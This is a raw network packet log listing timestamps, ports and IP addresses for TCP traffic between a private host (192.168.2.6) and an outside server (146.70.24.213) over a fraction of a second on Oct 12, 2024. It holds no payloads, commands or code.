Oct 12, 2024 20:30:05.742261887 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.782049894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.782140017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.782171965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.782205105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.782212973 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.782241106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.782274961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.782279968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.782310009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.782315969 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.782344103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.782426119 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.783576965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.783716917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.783766031 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.783771038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.783808947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.783840895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.783863068 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.783874035 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.783907890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.783919096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.783941031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.783974886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.783988953 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.784009933 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784043074 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784070969 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.784075975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784107924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784122944 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.784141064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784174919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784194946 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.784324884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784379005 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.784389019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784420013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784461021 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.784476042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784511089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784543991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784554958 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.784580946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784631014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784647942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.784780025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784830093 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.784846067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784878016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784910917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784919024 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.784945965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784979105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.784993887 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.785031080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785072088 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.785084009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785118103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785160065 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.785170078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785218954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785253048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785270929 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.785293102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785327911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785341024 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.785360098 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785394907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785428047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785428047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.785465002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785482883 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.785497904 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785531044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785542965 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.785564899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785600901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.785614014 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.786586046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.786629915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.786636114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.786664963 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.786698103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.786731958 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.786751032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.786794901 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.786802053 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.786853075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.786887884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.786899090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.786947012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.786995888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.786999941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787034988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787067890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787077904 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.787102938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787134886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787148952 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.787168980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787200928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787214994 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.787235022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787267923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787285089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.787302017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787333965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787343979 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.787370920 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787434101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.787461996 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.789097071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789132118 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789144993 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.789182901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789216042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789226055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.789251089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789283037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789290905 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.789316893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789357901 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.789604902 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789654970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789690018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789696932 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.789741039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789774895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789782047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.789825916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789860010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789860964 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.789911032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789944887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.789979935 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.789995909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790033102 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790046930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790081024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790113926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790122986 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790144920 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790177107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790186882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790210962 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790246964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790251970 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790280104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790313959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790321112 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790345907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790380001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790385008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790412903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790446997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790456057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790482044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790515900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790523052 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790549040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790582895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790591002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790613890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790647030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790652037 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790679932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790713072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790716887 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790745020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790781975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790787935 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.790813923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790848017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.790853024 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.836014032 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.874859095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.874902010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.874953985 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.874957085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.874991894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.875026941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.875030994 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.875060081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.875096083 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.875101089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.876341105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876389980 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.876394033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876426935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876460075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876470089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.876493931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876527071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876540899 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.876581907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876614094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876621962 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.876666069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876698971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876710892 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.876775026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876808882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876818895 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.876842022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876876116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876882076 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.876910925 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.876951933 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.877077103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877105951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877144098 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.877156019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877191067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877221107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877238035 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.877271891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877306938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877310991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.877342939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877372026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877382040 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.877607107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877652884 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.877687931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877739906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877779961 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.877791882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877842903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877876997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877887964 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.877926111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877959967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.877969980 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.877998114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878030062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878037930 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.878062963 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878096104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878101110 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.878129005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878163099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878170967 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.878194094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878226042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878230095 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.878259897 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878293037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878304005 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.878325939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878357887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878365040 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.878391027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878427982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878432035 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.878457069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.878496885 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.879357100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879420996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879467010 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.879477024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879528046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879564047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879573107 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.879597902 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879631996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879642963 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.879682064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879715919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879726887 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.879748106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879780054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879791021 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.879812956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879847050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879853964 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.879879951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879913092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879923105 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.879945993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879978895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.879986048 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.880012989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.880045891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.880055904 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.880078077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.880110979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.880121946 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.880145073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.880188942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.881983995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882019043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882052898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882066011 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882106066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882138014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882148027 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882170916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882204056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882215977 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882237911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882280111 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882328987 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882359028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882405996 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882410049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882443905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882476091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882488966 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882510900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882556915 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882565022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882600069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882632017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882637978 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882684946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882718086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882726908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882750988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882780075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882792950 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882812023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882860899 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882864952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882901907 CEST	1126	49710	146.70.24.213	192.168.2.6
